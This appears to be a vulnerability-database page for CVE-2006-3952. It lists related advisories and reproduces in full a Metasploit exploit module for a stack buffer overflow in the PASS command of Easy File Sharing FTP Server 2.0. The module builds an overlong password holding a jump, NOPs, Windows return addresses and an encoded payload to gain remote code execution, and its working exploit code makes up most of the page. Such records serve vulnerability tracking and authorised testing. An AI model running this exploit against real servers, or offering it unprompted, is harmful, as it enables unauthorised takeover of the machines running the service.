Lucene search

Easy File Sharing FTP Server 2.0 PASS Overflow

🗓️ 26 Mar 2007 21:27:20Reported by MC <[email protected]>Type

Easy File Sharing FTP Server 2.0 PASS Overflow. Stack buffer overflow allows arbitrary code execution

Reporter	Title	Published	Views	Family All 13
Tenable Nessus	Easy File Sharing FTP Server PASS Command Overflow	17 Jan 200700:00	–	nessus
0day.today	Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow	1 Jun 201400:00	–	zdt
canvas	Immunity Canvas: EASYFILESHARING	1 Aug 200621:04	–	canvas
CVE	CVE-2006-3952	1 Aug 200621:04	–	cve
NVD	CVE-2006-3952	1 Aug 200621:04	–	nvd
exploitpack	Easy File Sharing FTP Server 3.5 - Remote Stack Buffer Overflow	27 May 201400:00	–	exploitpack
Exploit DB	Easy File Sharing FTP Server 2.0 - PASS Overflow (Metasploit)	9 May 201000:00	–	exploitdb
Exploit DB	Easy File Sharing FTP Server 3.5 - Remote Stack Buffer Overflow	27 May 201400:00	–	exploitdb
seebug.org	Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow	1 Jul 201400:00	–	seebug
Packet Storm	Easy File Sharing FTP Server 3.5 Buffer Overflow	30 May 201400:00	–	packetstorm

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy File Sharing FTP Server 2.0 PASS Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the Easy File Sharing 2.0
        service. By sending an overly long password, an attacker can execute
        arbitrary code.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-3952' ],
          [ 'OSVDB', '27646' ],
          [ 'BID', '19243' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4 } ],
          [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
        ],
      'DisclosureDate' => '2006-07-31',
      'DefaultTarget'  => 0))
  end

  def check
    connect
    disconnect

    if (banner =~ /Easy File Sharing FTP Server/)
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    filler =  rand_text_english(2559) + "\xeb\x12"
    filler << make_nops(2) + [target.ret].pack('V')

    sploit = "\x2c" + filler + payload.encoded

    print_status("Trying target #{target.name}...")

    # needs anonymous to be set.
    send_cmd(['USER', "anonymous"], true)
    send_cmd(['PASS', sploit], false)

    handler
    disconnect
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

26 Mar 2007 21:20Current

8.3High risk

Vulners AI Score8.3

CVSS27.5

EPSS0.85437